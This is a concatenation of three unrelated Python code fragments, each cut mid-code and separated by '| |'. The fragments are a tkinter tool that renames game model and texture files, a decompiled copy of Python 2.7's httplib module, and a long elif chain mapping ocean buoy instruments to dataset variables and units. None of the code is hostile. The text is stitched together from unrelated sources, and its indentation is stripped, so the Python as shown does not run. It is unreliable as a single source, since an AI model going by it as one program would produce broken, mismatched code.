filename, extension = splitext(f)
if (extension == ".png"):
mapFiles.append(f)
elif (extension == ".jm"):
jmFiles.append(f)
return (mapFiles, jmFiles)
def populate_listbox(listbox, files):
# Delete all items in list box
clear_listbox(listbox)
# Insert file names into listbox
for f in files:
listbox.insert(END, f)
def clear_listbox(listbox):
listbox.delete(0, END)
def delete_item_skin_lb():
if skinsListbox.get(0):
selection = skinsListbox.curselection()
selectionList = []
for i in selection:
selectionList.append(skinsListbox.get(i))
for i in selection[::-1]:
skinsListbox.delete(i)
print(f"Removing {selectionList} from available skins and maps...")
else:
print("Skins listbox was empty...")
def delete_item_jm_lb():
if jmListbox.get(0):
selection = jmListbox.curselection()
selectionList = []
for i in selection:
selectionList.append(jmListbox.get(i))
for i in selection[::-1]:
jmListbox.delete(i)
print(f"Removing {selectionList} from available JMs...")
else:
print("JMs listbox was empty...")
def create_directory(directory, modelName):
rootDir = directory + f"/RenamedFiles/{modelName}"
jmDir = rootDir + "/JM"
mapsDir = rootDir + "/Maps"
rootDirExists = path.exists(rootDir)
mapsDirExists = path.exists(mapsDir)
jmDirExists = path.exists(jmDir)
if rootDirExists and mapsDirExists and jmDirExists:
return (rootDir, mapsDir, jmDir)
else:
if not rootDirExists:
os.makedirs(rootDir)
if not jmDirExists:
os.mkdir(jmDir)
if not mapsDirExists:
os.mkdir(mapsDir)
return (rootDir, mapsDir, jmDir)
def sort_maps():
normalMap = None
specMap = None
diffuseMaps = []
dynoSelection = dynoListbox.selection_get()
dynoValue = None
for item in dynosList:
if dynoSelection == item:
dynoValue = dynosList[dynoSelection]
if dynoValue != None:
maps = skinsListbox.get(0, END)
for i in range(0, len(maps)):
# Normal Map
if "norm" in maps[i] or "Norm" in maps[i]:
if messagebox.askyesno("Is this your normal map?", maps[i]):
normalMap = maps[i]
print(f"Normal map: {normalMap}")
else:
diffuseMaps.append(maps[i])
# Spec map
elif "spec" in maps[i] or "Spec" in maps[i]:
if messagebox.askyesno("Is this your specular map?", maps[i]):
specMap = maps[i]
print(f"Specular map: {specMap}")
else:
diffuseMaps.append(maps[i])
print(f"Diffuse map: {maps[i]}")
return (normalMap, specMap, diffuseMaps)
else:
print("The key supplied does not exist in the dynos dictionary...")
return None
def rename_all_files():
# Check to see if skins lb or jms lb has items in them
skinsLbPopulated = skinsListbox.get(0)
jmsLbPopulated = jmListbox.get(0)
if not skinsLbPopulated and not jmsLbPopulated:
print("You need to choose a directory that has skins or jms...")
return
# Check to see if the model name entry is blank
if modelNameEntry.get().lower() == "":
print("You need to supply a model name...")
return
# Check to see if a dyno is selected
if not dynoListbox.curselection():
print("You need to select a dyno...")
return
# Run the skin renaming
rename_map_files()
# Run the JM renaming
rename_jm_files()
def rename_map_files():
# Check to see if skins lb or jms lb has items in them
skinsLbPopulated = skinsListbox.get(0)
if not skinsLbPopulated:
print("You need to choose a directory that has skins...")
return
# Check to see if the model name entry is blank
if modelNameEntry.get().lower() == "":
print("You need to supply a model name...")
return
# Check to see if a dyno is selected
if not dynoListbox.curselection():
print("You need to select a dyno...")
return
# Get the sorted maps
sortedMaps = sort_maps()
if sortedMaps == None:
return
normalMap = sortedMaps[0]
specMap = sortedMaps[1]
diffuseMaps = sortedMaps[2]
# Create a place to store the maps
newPaths = create_directory(root.directory, modelNameEntry.get().lower())
# Create new maps and JMs
copy_maps_to_directory(newPaths[1])
# Rename normal map
if normalMap != None:
rename_map(f"{newPaths[1]}", normalMap, "norm")
# Rename spec map
if specMap != None:
rename_map(f"{newPaths[1]}", specMap, "spec")
# Rename diffuse maps
if len(diffuseMaps) > 0:
for item in diffuseMaps:
rename_map(f"{newPaths[1]}", item, "none")
def rename_jm_files():
# Check to see if jms lb has items in them
jmsLbPopulated = jmListbox.get(0)
if not jmsLbPopulated:
print("You need to choose a directory that has jms...")
return
# Check to see if the model name entry is blank
if modelNameEntry.get().lower() == "":
print("You need to supply a model name...")
return
# Check to see if a dyno is selected
if not dynoListbox.curselection():
print("You need to select a dyno...")
return
# Get paths for new JMs
newPaths = create_directory(root.directory, modelNameEntry.get().lower())
# Copy jms to new directory
copy_jms_to_directory(newPaths[2])
# Rename all of the JMs
for jm in jmListbox.get(0, END):
rename_jm(newPaths[2], jm)
def copy_maps_to_directory(directory):
for item in skinsListbox.get(0, END):
copy = shutil.copyfile(
f"{root.directory}/{item}", f"{directory}/{item}")
def copy_jms_to_directory(directory):
for item in jmListbox.get(0, END):
shutil.copyfile(f"{root.directory}/{item}", f"{directory}/{item}")
def copy_files_to_directory(currentDirectory, copyToDirectory, fileExtensions = ""):
for f in listdir(currentDirectory):
filepath = join(currentDirectory + "/" + f)
if isfile(filepath):
if fileExtensions == "":
shutil.copyfile(f"{currentDirectory}/{f}", f"{copyToDirectory}/{f}")
else:
includedExtensions = 0
for ext in fileExtensions:
if ext in filepath:
includedExtensions += 1
if len(fileExtensions) > 1 and includedExtensions == 2:
shutil.copyfile(f"{currentDirectory}/{f}", f"{copyToDirectory}/{f}")
elif len(fileExtensions) == 1:
shutil.copyfile(f"{currentDirectory}/{f}", f"{copyToDirectory}/{f}")
def rename_map(directory, map, special):
# Check to see if map halfway named
filename = None
if "-" in map:
splitName = map.rsplit("-", 1)
trim = messagebox.askyesno(
f"Do you want to trim after the '-' in {map}?", f"Not used: {splitName[0]}-, Used: {splitName[1]}")
if trim == True:
filename = splitName[1]
else:
filename = map
else:
filename = map
dynoSelection = dynoListbox.selection_get()
dynoValue = None
for item in dynosList:
if dynoSelection == item:
dynoValue = dynosList[dynoSelection]
output = None
if special == "norm":
output = f"{directory}/{dynoValue}-{modelNameEntry.get().lower()}_norm.png"
try:
os.rename(f"{directory}/{map}", output)
except OSError as e:
os.remove(output)
os.rename(f"{directory}/{map}", output)
elif special == "spec":
output = f"{directory}/{dynoValue}-{modelNameEntry.get().lower()}_spec.png"
try:
os.rename(f"{directory}/{map}", output)
except OSError as e:
os.remove(output)
os.rename(f"{directory}/{map}", output)
else:
output = f"{directory}/{dynoValue}-{modelNameEntry.get().lower()}-{filename}"
try:
os.rename(f"{directory}/{map}", output)
except OSError as e:
os.remove(output)
os.rename(f"{directory}/{map}", output)
def rename_jm(directory, jm):
# Get the selected dyno
dynoSelection = dynoListbox.selection_get()
dynoValue = None
for item in dynosList:
if dynoSelection == item:
dynoValue = dynosList[dynoSelection]
# Extract JM type
jmType = None
for type in jmParts:
if type.lower() == "wheels":
saveDir = f"{directory}"
filename = None
if "front_wheel" in jm.lower():
filename = f"front_wheel-{modelNameEntry.get().lower()}.jm"
elif "rear_wheel" in jm.lower():
filename = f"rear_wheel-{modelNameEntry.get().lower()}.jm"
else:
continue
# See if file exists - need to delete if so or error on windows, MacOS and Linux OK
if os.path.exists(f"{saveDir}/{filename}"):
os.remove(f"{saveDir}/{filename}")
# Rename the jm file
os.rename(f"{saveDir}/{jm}", f"{saveDir}/{filename}")
else:
# Cast to lowercase just in case the JM is saved weird
if type.lower() in jm.lower():
jmType = type
saveDir = f"{directory}"
filename = f"{dynoValue}_{jmType}-{modelNameEntry.get().lower()}.jm"
# Change file name to only dyno and model name if rider or wheels
if jmType.lower() == "rider_body" or jmType.lower() == "rider_head":
filename = f"{dynoValue}-{modelNameEntry.get().lower()}.jm"
# See if file exists - need to delete if so or error on windows, MacOS and Linux OK
if os.path.exists(f"{saveDir}/{filename}"):
os.remove(f"{saveDir}/{filename}")
# Rename the jm file
os.rename(f"{saveDir}/{jm}", f"{saveDir}/{filename}")
def saf_all():
run_saf_files(0)
def saf_maps():
run_saf_files(1)
def saf_jms():
run_saf_files(2)
def run_saf_files(typeIndex):
# Change into working directory just to be safe
os.chdir(workingDirectory)
# Check to see if the model name is empty
if modelNameEntry.get().lower() == "":
print("SAF Files: You need to supply a model name to saf your files...")
return
else:
# Check to see if there is a root directory
if root.directory == None:
print("SAF Files: You need to supply a directory...")
return
else:
# Make TEMP folder in plugins
if not path.exists("plugins/TEMP"):
os.makedirs("plugins/TEMP")
print("SAF Files: Created temp export directory...")
# Copy all necessary files to the temp folder
renamedFilesDirectory = f"{root.directory}/RenamedFiles"
subDirs = os.listdir(renamedFilesDirectory)
modelDir = None
# Get all the sub-directories and set modelDir if | |
# uncompyle6 version 3.2.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)]
# Embedded file name: httplib
from array import array
import os, socket
from sys import py3kwarning
from urlparse import urlsplit
import warnings
with warnings.catch_warnings():
if py3kwarning:
warnings.filterwarnings('ignore', '.*mimetools has been removed', DeprecationWarning)
import mimetools
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
__all__ = [
'HTTP', 'HTTPResponse', 'HTTPConnection',
'HTTPException', 'NotConnected', 'UnknownProtocol',
'UnknownTransferEncoding', 'UnimplementedFileMode',
'IncompleteRead', 'InvalidURL', 'ImproperConnectionState',
'CannotSendRequest', 'CannotSendHeader', 'ResponseNotReady',
'BadStatusLine', 'error', 'responses']
HTTP_PORT = 80
HTTPS_PORT = 443
_UNKNOWN = 'UNKNOWN'
_CS_IDLE = 'Idle'
_CS_REQ_STARTED = 'Request-started'
_CS_REQ_SENT = 'Request-sent'
CONTINUE = 100
SWITCHING_PROTOCOLS = 101
PROCESSING = 102
OK = 200
CREATED = 201
ACCEPTED = 202
NON_AUTHORITATIVE_INFORMATION = 203
NO_CONTENT = 204
RESET_CONTENT = 205
PARTIAL_CONTENT = 206
MULTI_STATUS = 207
IM_USED = 226
MULTIPLE_CHOICES = 300
MOVED_PERMANENTLY = 301
FOUND = 302
SEE_OTHER = 303
NOT_MODIFIED = 304
USE_PROXY = 305
TEMPORARY_REDIRECT = 307
BAD_REQUEST = 400
UNAUTHORIZED = 401
PAYMENT_REQUIRED = 402
FORBIDDEN = 403
NOT_FOUND = 404
METHOD_NOT_ALLOWED = 405
NOT_ACCEPTABLE = 406
PROXY_AUTHENTICATION_REQUIRED = 407
REQUEST_TIMEOUT = 408
CONFLICT = 409
GONE = 410
LENGTH_REQUIRED = 411
PRECONDITION_FAILED = 412
REQUEST_ENTITY_TOO_LARGE = 413
REQUEST_URI_TOO_LONG = 414
UNSUPPORTED_MEDIA_TYPE = 415
REQUESTED_RANGE_NOT_SATISFIABLE = 416
EXPECTATION_FAILED = 417
UNPROCESSABLE_ENTITY = 422
LOCKED = 423
FAILED_DEPENDENCY = 424
UPGRADE_REQUIRED = 426
INTERNAL_SERVER_ERROR = 500
NOT_IMPLEMENTED = 501
BAD_GATEWAY = 502
SERVICE_UNAVAILABLE = 503
GATEWAY_TIMEOUT = 504
HTTP_VERSION_NOT_SUPPORTED = 505
INSUFFICIENT_STORAGE = 507
NOT_EXTENDED = 510
responses = {100: 'Continue',
101: 'Switching Protocols',
200: 'OK',
201: 'Created',
202: 'Accepted',
203: 'Non-Authoritative Information',
204: 'No Content',
205: 'Reset Content',
206: 'Partial Content',
300: 'Multiple Choices',
301: 'Moved Permanently',
302: 'Found',
303: 'See Other',
304: 'Not Modified',
305: 'Use Proxy',
306: '(Unused)',
307: 'Temporary Redirect',
400: 'Bad Request',
401: 'Unauthorized',
402: 'Payment Required',
403: 'Forbidden',
404: 'Not Found',
405: 'Method Not Allowed',
406: 'Not Acceptable',
407: 'Proxy Authentication Required',
408: 'Request Timeout',
409: 'Conflict',
410: 'Gone',
411: 'Length Required',
412: 'Precondition Failed',
413: 'Request Entity Too Large',
414: 'Request-URI Too Long',
415: 'Unsupported Media Type',
416: 'Requested Range Not Satisfiable',
417: 'Expectation Failed',
500: 'Internal Server Error',
501: 'Not Implemented',
502: 'Bad Gateway',
503: 'Service Unavailable',
504: 'Gateway Timeout',
505: 'HTTP Version Not Supported'}
MAXAMOUNT = 1048576
_MAXLINE = 65536
class HTTPMessage(mimetools.Message):
def addheader(self, key, value):
prev = self.dict.get(key)
if prev is None:
self.dict[key] = value
else:
combined = (', ').join((prev, value))
self.dict[key] = combined
return
def addcontinue(self, key, more):
prev = self.dict[key]
self.dict[key] = prev + '\n ' + more
def readheaders(self):
self.dict = {}
self.unixfrom = ''
self.headers = hlist = []
self.status = ''
headerseen = ''
firstline = 1
startofline = unread = tell = None
if hasattr(self.fp, 'unread'):
unread = self.fp.unread
else:
if self.seekable:
tell = self.fp.tell
while True:
if tell:
try:
startofline = tell()
except IOError:
startofline = tell = None
self.seekable = 0
line = self.fp.readline(_MAXLINE + 1)
if len(line) > _MAXLINE:
raise LineTooLong('header line')
if not line:
self.status = 'EOF in headers'
break
if firstline and line.startswith('From '):
self.unixfrom = self.unixfrom + line
continue
firstline = 0
if headerseen and line[0] in ' \t':
hlist.append(line)
self.addcontinue(headerseen, line.strip())
continue
else:
if self.iscomment(line):
continue
else:
if self.islast(line):
break
headerseen = self.isheader(line)
if headerseen:
hlist.append(line)
self.addheader(headerseen, line[len(headerseen) + 1:].strip())
continue
else:
if not self.dict:
self.status = 'No headers'
else:
self.status = 'Non-header line where header expected'
if unread:
unread(line)
else:
if tell:
self.fp.seek(startofline)
else:
self.status = self.status + '; bad seek'
break
return
class HTTPResponse():
def __init__(self, sock, debuglevel=0, strict=0, method=None, buffering=False):
if buffering:
self.fp = sock.makefile('rb')
else:
self.fp = sock.makefile('rb', 0)
self.debuglevel = debuglevel
self.strict = strict
self._method = method
self.msg = None
self.version = _UNKNOWN
self.status = _UNKNOWN
self.reason = _UNKNOWN
self.chunked = _UNKNOWN
self.chunk_left = _UNKNOWN
self.length = _UNKNOWN
self.will_close = _UNKNOWN
return
def _read_status(self):
line = self.fp.readline(_MAXLINE + 1)
if len(line) > _MAXLINE:
raise LineTooLong('header line')
if self.debuglevel > 0:
print 'reply:', repr(line)
if not line:
raise BadStatusLine(line)
try:
version, status, reason = line.split(None, 2)
except ValueError:
try:
version, status = line.split(None, 1)
reason = ''
except ValueError:
version = ''
if not version.startswith('HTTP/'):
if self.strict:
self.close()
raise BadStatusLine(line)
else:
self.fp = LineAndFileWrapper(line, self.fp)
return ('HTTP/0.9', 200, '')
try:
status = int(status)
if status < 100 or status > 999:
raise BadStatusLine(line)
except ValueError:
raise BadStatusLine(line)
return (version, status, reason)
def begin(self):
if self.msg is not None:
return
while True:
version, status, reason = self._read_status()
if status != CONTINUE:
break
while True:
skip = self.fp.readline(_MAXLINE + 1)
if len(skip) > _MAXLINE:
raise LineTooLong('header line')
skip = skip.strip()
if not skip:
break
if self.debuglevel > 0:
print 'header:', skip
self.status = status
self.reason = reason.strip()
if version == 'HTTP/1.0':
self.version = 10
else:
if version.startswith('HTTP/1.'):
self.version = 11
else:
if version == 'HTTP/0.9':
self.version = 9
else:
raise UnknownProtocol(version)
if self.version == 9:
self.length = None
self.chunked = 0
self.will_close = 1
self.msg = HTTPMessage(StringIO())
return
self.msg = HTTPMessage(self.fp, 0)
if self.debuglevel > 0:
for hdr in self.msg.headers:
print 'header:', hdr,
self.msg.fp = None
tr_enc = self.msg.getheader('transfer-encoding')
if tr_enc and tr_enc.lower() == 'chunked':
self.chunked = 1
self.chunk_left = None
else:
self.chunked = 0
self.will_close = self._check_close()
length = self.msg.getheader('content-length')
if length and not self.chunked:
try:
self.length = int(length)
except ValueError:
self.length = None
else:
if self.length < 0:
self.length = None
else:
self.length = None
if status == NO_CONTENT or status == NOT_MODIFIED or 100 <= status < 200 or self._method == 'HEAD':
self.length = 0
if not self.will_close and not self.chunked and self.length is None:
self.will_close = 1
return
def _check_close(self):
conn = self.msg.getheader('connection')
if self.version == 11:
conn = self.msg.getheader('connection')
if conn and 'close' in conn.lower():
return True
return False
if self.msg.getheader('keep-alive'):
return False
if conn and 'keep-alive' in conn.lower():
return False
pconn = self.msg.getheader('proxy-connection')
if pconn and 'keep-alive' in pconn.lower():
return False
return True
def close(self):
if self.fp:
self.fp.close()
self.fp = None
return
def isclosed(self):
return self.fp is None
def read(self, amt=None):
if self.fp is None:
return ''
if self._method == 'HEAD':
self.close()
return ''
if self.chunked:
return self._read_chunked(amt)
if amt is None:
if self.length is None:
s = self.fp.read()
else:
try:
s = self._safe_read(self.length)
except IncompleteRead:
self.close()
raise
self.length = 0
self.close()
return s
if self.length is not None:
if amt > self.length:
amt = self.length
s = self.fp.read(amt)
if not s:
self.close()
if self.length is not None:
self.length -= len(s)
if not self.length:
self.close()
return s
def _read_chunked(self, amt):
chunk_left = self.chunk_left
value = []
while True:
if chunk_left is None:
line = self.fp.readline(_MAXLINE + 1)
if len(line) > _MAXLINE:
raise LineTooLong('chunk size')
i = line.find(';')
if i >= 0:
line = line[:i]
try:
chunk_left = int(line, 16)
except ValueError:
self.close()
raise IncompleteRead(('').join(value))
if chunk_left == 0:
break
if amt is None:
value.append(self._safe_read(chunk_left))
else:
if amt < chunk_left:
value.append(self._safe_read(amt))
self.chunk_left = chunk_left - amt
return ('').join(value)
if amt == chunk_left:
value.append(self._safe_read(amt))
self._safe_read(2)
self.chunk_left = None
return ('').join(value)
value.append(self._safe_read(chunk_left))
amt -= chunk_left
self._safe_read(2)
chunk_left = None
while True:
line = self.fp.readline(_MAXLINE + 1)
if len(line) > _MAXLINE:
raise LineTooLong('trailer line')
if not line:
break
if line == '\r\n':
break
self.close()
return ('').join(value)
def _safe_read(self, amt):
s = []
while amt > 0:
chunk = self.fp.read(min(amt, MAXAMOUNT))
if not chunk:
raise IncompleteRead(('').join(s), amt)
s.append(chunk)
amt -= len(chunk)
return ('').join(s)
def fileno(self):
return self.fp.fileno()
def getheader(self, name, default=None):
if self.msg is None:
raise ResponseNotReady()
return self.msg.getheader(name, default)
def getheaders(self):
if self.msg is None:
raise ResponseNotReady()
return self.msg.items()
class HTTPConnection():
_http_vsn = 11
_http_vsn_str = 'HTTP/1.1'
response_class = HTTPResponse
default_port = HTTP_PORT
auto_open = 1
debuglevel = 0
strict = 0
def __init__(self, host, port=None, strict=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT, source_address=None):
self.timeout = timeout
self.source_address = source_address
self.sock = None
self._buffer = []
self.__response = None
self.__state = _CS_IDLE
self._method = None
self._tunnel_host = None
self._tunnel_port = None
self._tunnel_headers = {}
self._set_hostport(host, port)
if strict is not None:
self.strict = strict
return
def set_tunnel(self, host, port=None, headers=None):
self._tunnel_host = host
self._tunnel_port | |
== 'RecoveredHost':
uframe_dataset_name = 'CE01ISSM/SBD17/01-MOPAK0000/recovered_host/mopak_o_dcl_accel_recovered'
var_list[0].name = 'time'
var_list[0].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
elif platform_name == 'CE02SHSM' and node == 'BUOY' and instrument_class == 'MOPAK' and method == 'RecoveredHost':
uframe_dataset_name = 'CE02SHSM/SBD11/01-MOPAK0000/recovered_host/mopak_o_dcl_accel_recovered'
var_list[0].name = 'time'
var_list[0].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
elif platform_name == 'CE04OSSM' and node == 'BUOY' and instrument_class == 'MOPAK' and method == 'RecoveredHost':
uframe_dataset_name = 'CE04OSSM/SBD11/01-MOPAK0000/recovered_host/mopak_o_dcl_accel_recovered'
var_list[0].name = 'time'
var_list[0].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
elif platform_name == 'CE06ISSM' and node == 'BUOY' and instrument_class == 'MOPAK' and method == 'RecoveredHost':
uframe_dataset_name = 'CE06ISSM/SBD17/01-MOPAK0000/recovered_host/mopak_o_dcl_accel_recovered'
var_list[0].name = 'time'
var_list[0].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
elif platform_name == 'CE07SHSM' and node == 'BUOY' and instrument_class == 'MOPAK' and method == 'RecoveredHost':
uframe_dataset_name = 'CE07SHSM/SBD11/01-MOPAK0000/recovered_host/mopak_o_dcl_accel_recovered'
var_list[0].name = 'time'
var_list[0].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
elif platform_name == 'CE09OSSM' and node == 'BUOY' and instrument_class == 'MOPAK' and method == 'RecoveredHost':
uframe_dataset_name = 'CE09OSSM/SBD11/01-MOPAK0000/recovered_host/mopak_o_dcl_accel_recovered'
var_list[0].name = 'time'
var_list[0].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
elif platform_name == 'CE09OSPM' and node == 'BUOY' and instrument_class == 'MOPAK' and method == 'RecoveredHost':
uframe_dataset_name = 'CE09OSPM/SBS01/01-MOPAK0000/recovered_host/mopak_o_dcl_accel_recovered'
var_list[0].name = 'time'
var_list[0].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
#METBK
elif platform_name == 'CE02SHSM' and node == 'BUOY' and instrument_class == 'METBK1' and method == 'RecoveredHost':
uframe_dataset_name = 'CE02SHSM/SBD11/06-METBKA000/recovered_host/metbk_a_dcl_instrument_recovered'
var_list[0].name = 'time'
var_list[1].name = 'sea_surface_temperature'
var_list[2].name = 'sea_surface_conductivity'
var_list[3].name = 'met_salsurf'
var_list[4].name = 'met_windavg_mag_corr_east'
var_list[5].name = 'met_windavg_mag_corr_north'
var_list[6].name = 'barometric_pressure'
var_list[7].name = 'air_temperature'
var_list[8].name = 'relative_humidity'
var_list[9].name = 'longwave_irradiance'
var_list[10].name = 'shortwave_irradiance'
var_list[11].name = 'precipitation'
var_list[12].name = 'met_heatflx_minute'
var_list[13].name = 'met_latnflx_minute'
var_list[14].name = 'met_netlirr_minute'
var_list[15].name = 'met_sensflx_minute'
var_list[16].name = 'eastward_velocity'
var_list[17].name = 'northward_velocity'
var_list[18].name = 'met_spechum'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[6].data = np.array([])
var_list[7].data = np.array([])
var_list[8].data = np.array([])
var_list[9].data = np.array([])
var_list[10].data = np.array([])
var_list[11].data = np.array([])
var_list[12].data = np.array([])
var_list[13].data = np.array([])
var_list[14].data = np.array([])
var_list[15].data = np.array([])
var_list[16].data = np.array([])
var_list[17].data = np.array([])
var_list[18].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'degC'
var_list[2].units = 'S/m'
var_list[3].units = 'unitless'
var_list[4].units = 'm/s'
var_list[5].units = 'm/s'
var_list[6].units = 'mbar'
var_list[7].units = 'degC'
var_list[8].units = '#'
var_list[9].units = 'W/m'
var_list[10].units = 'W/m'
var_list[11].units = 'mm'
var_list[12].units = 'W/m'
var_list[13].units = 'W/m'
var_list[14].units = 'W/m'
var_list[15].units = 'W/m'
var_list[16].units = 'm/s'
var_list[17].units = 'm/s'
var_list[18].units = 'g/kg'
elif platform_name == 'CE04OSSM' and node == 'BUOY' and instrument_class == 'METBK1' and method == 'RecoveredHost':
uframe_dataset_name = 'CE04OSSM/SBD11/06-METBKA000/recovered_host/metbk_a_dcl_instrument_recovered'
var_list[0].name = 'time'
var_list[1].name = 'sea_surface_temperature'
var_list[2].name = 'sea_surface_conductivity'
var_list[3].name = 'met_salsurf'
var_list[4].name = 'met_windavg_mag_corr_east'
var_list[5].name = 'met_windavg_mag_corr_north'
var_list[6].name = 'barometric_pressure'
var_list[7].name = 'air_temperature'
var_list[8].name = 'relative_humidity'
var_list[9].name = 'longwave_irradiance'
var_list[10].name = 'shortwave_irradiance'
var_list[11].name = 'precipitation'
var_list[12].name = 'met_heatflx_minute'
var_list[13].name = 'met_latnflx_minute'
var_list[14].name = 'met_netlirr_minute'
var_list[15].name = 'met_sensflx_minute'
var_list[16].name = 'eastward_velocity'
var_list[17].name = 'northward_velocity'
var_list[18].name = 'met_spechum'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[6].data = np.array([])
var_list[7].data = np.array([])
var_list[8].data = np.array([])
var_list[9].data = np.array([])
var_list[10].data = np.array([])
var_list[11].data = np.array([])
var_list[12].data = np.array([])
var_list[13].data = np.array([])
var_list[14].data = np.array([])
var_list[15].data = np.array([])
var_list[16].data = np.array([])
var_list[17].data = np.array([])
var_list[18].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'degC'
var_list[2].units = 'S/m'
var_list[3].units = 'unitless'
var_list[4].units = 'm/s'
var_list[5].units = 'm/s'
var_list[6].units = 'mbar'
var_list[7].units = 'degC'
var_list[8].units = '#'
var_list[9].units = 'W/m'
var_list[10].units = 'W/m'
var_list[11].units = 'mm'
var_list[12].units = 'W/m'
var_list[13].units = 'W/m'
var_list[14].units = 'W/m'
var_list[15].units = 'W/m'
var_list[16].units = 'm/s'
var_list[17].units = 'm/s'
var_list[18].units = 'g/kg'
elif platform_name == 'CE07SHSM' and node == 'BUOY' and instrument_class == 'METBK1' and method == 'RecoveredHost':
uframe_dataset_name = 'CE07SHSM/SBD11/06-METBKA000/recovered_host/metbk_a_dcl_instrument_recovered'
var_list[0].name = 'time'
var_list[1].name = 'sea_surface_temperature'
var_list[2].name = 'sea_surface_conductivity'
var_list[3].name = 'met_salsurf'
var_list[4].name = 'met_windavg_mag_corr_east'
var_list[5].name = 'met_windavg_mag_corr_north'
var_list[6].name = 'barometric_pressure'
var_list[7].name = 'air_temperature'
var_list[8].name = 'relative_humidity'
var_list[9].name = 'longwave_irradiance'
var_list[10].name = 'shortwave_irradiance'
var_list[11].name = 'precipitation'
var_list[12].name = 'met_heatflx_minute'
var_list[13].name = 'met_latnflx_minute'
var_list[14].name = 'met_netlirr_minute'
var_list[15].name = 'met_sensflx_minute'
var_list[16].name = 'eastward_velocity'
var_list[17].name = 'northward_velocity'
var_list[18].name = 'met_spechum'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[6].data = np.array([])
var_list[7].data = np.array([])
var_list[8].data = np.array([])
var_list[9].data = np.array([])
var_list[10].data = np.array([])
var_list[11].data = np.array([])
var_list[12].data = np.array([])
var_list[13].data = np.array([])
var_list[14].data = np.array([])
var_list[15].data = np.array([])
var_list[16].data = np.array([])
var_list[17].data = np.array([])
var_list[18].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'degC'
var_list[2].units = 'S/m'
var_list[3].units = 'unitless'
var_list[4].units = 'm/s'
var_list[5].units = 'm/s'
var_list[6].units = 'mbar'
var_list[7].units = 'degC'
var_list[8].units = '#'
var_list[9].units = 'W/m'
var_list[10].units = 'W/m'
var_list[11].units = 'mm'
var_list[12].units = 'W/m'
var_list[13].units = 'W/m'
var_list[14].units = 'W/m'
var_list[15].units = 'W/m'
var_list[16].units = 'm/s'
var_list[17].units = 'm/s'
var_list[18].units = 'g/kg'
elif platform_name == 'CE09OSSM' and node == 'BUOY' and instrument_class == 'METBK1' and method == 'RecoveredHost':
uframe_dataset_name = 'CE09OSSM/SBD11/06-METBKA000/recovered_host/metbk_a_dcl_instrument_recovered'
var_list[0].name = 'time'
var_list[1].name = 'sea_surface_temperature'
var_list[2].name = 'sea_surface_conductivity'
var_list[3].name = 'met_salsurf'
var_list[4].name = 'met_windavg_mag_corr_east'
var_list[5].name = 'met_windavg_mag_corr_north'
var_list[6].name = 'barometric_pressure'
var_list[7].name = 'air_temperature'
var_list[8].name = 'relative_humidity'
var_list[9].name = 'longwave_irradiance'
var_list[10].name = 'shortwave_irradiance'
var_list[11].name = 'precipitation'
var_list[12].name = 'met_heatflx_minute'
var_list[13].name = 'met_latnflx_minute'
var_list[14].name = 'met_netlirr_minute'
var_list[15].name = 'met_sensflx_minute'
var_list[16].name = 'eastward_velocity'
var_list[17].name = 'northward_velocity'
var_list[18].name = 'met_spechum'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[6].data = np.array([])
var_list[7].data = np.array([])
var_list[8].data = np.array([])
var_list[9].data = np.array([])
var_list[10].data = np.array([])
var_list[11].data = np.array([])
var_list[12].data = np.array([])
var_list[13].data = np.array([])
var_list[14].data = np.array([])
var_list[15].data = np.array([])
var_list[16].data = np.array([])
var_list[17].data = np.array([])
var_list[18].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'degC'
var_list[2].units = 'S/m'
var_list[3].units = 'unitless'
var_list[4].units = 'm/s'
var_list[5].units = 'm/s'
var_list[6].units = 'mbar'
var_list[7].units = 'degC'
var_list[8].units = '#'
var_list[9].units = 'W/m'
var_list[10].units = 'W/m'
var_list[11].units = 'mm'
var_list[12].units = 'W/m'
var_list[13].units = 'W/m'
var_list[14].units = 'W/m'
var_list[15].units = 'W/m'
var_list[16].units = 'm/s'
var_list[17].units = 'm/s'
var_list[18].units = 'g/kg'
#FLORT
elif platform_name == 'CE01ISSM' and node == 'NSIF' and instrument_class == 'FLORT' and method == 'RecoveredHost':
uframe_dataset_name = 'CE01ISSM/RID16/02-FLORTD000/recovered_host/flort_sample'
var_list[0].name = 'time'
var_list[1].name = 'seawater_scattering_coefficient'
var_list[2].name = 'fluorometric_chlorophyll_a'
var_list[3].name = 'fluorometric_cdom'
var_list[4].name = 'total_volume_scattering_coefficient'
var_list[5].name = 'optical_backscatter'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'm-1'
var_list[2].units = 'ug/L'
var_list[3].units = 'ppb'
var_list[4].units = 'm-1 sr-1'
var_list[5].units = 'm-1'
elif platform_name == 'CE01ISSM' and node == 'BUOY' and instrument_class == 'FLORT' and method == 'RecoveredHost':
uframe_dataset_name = 'CE01ISSM/SBD17/06-FLORTD000/recovered_host/flort_sample'
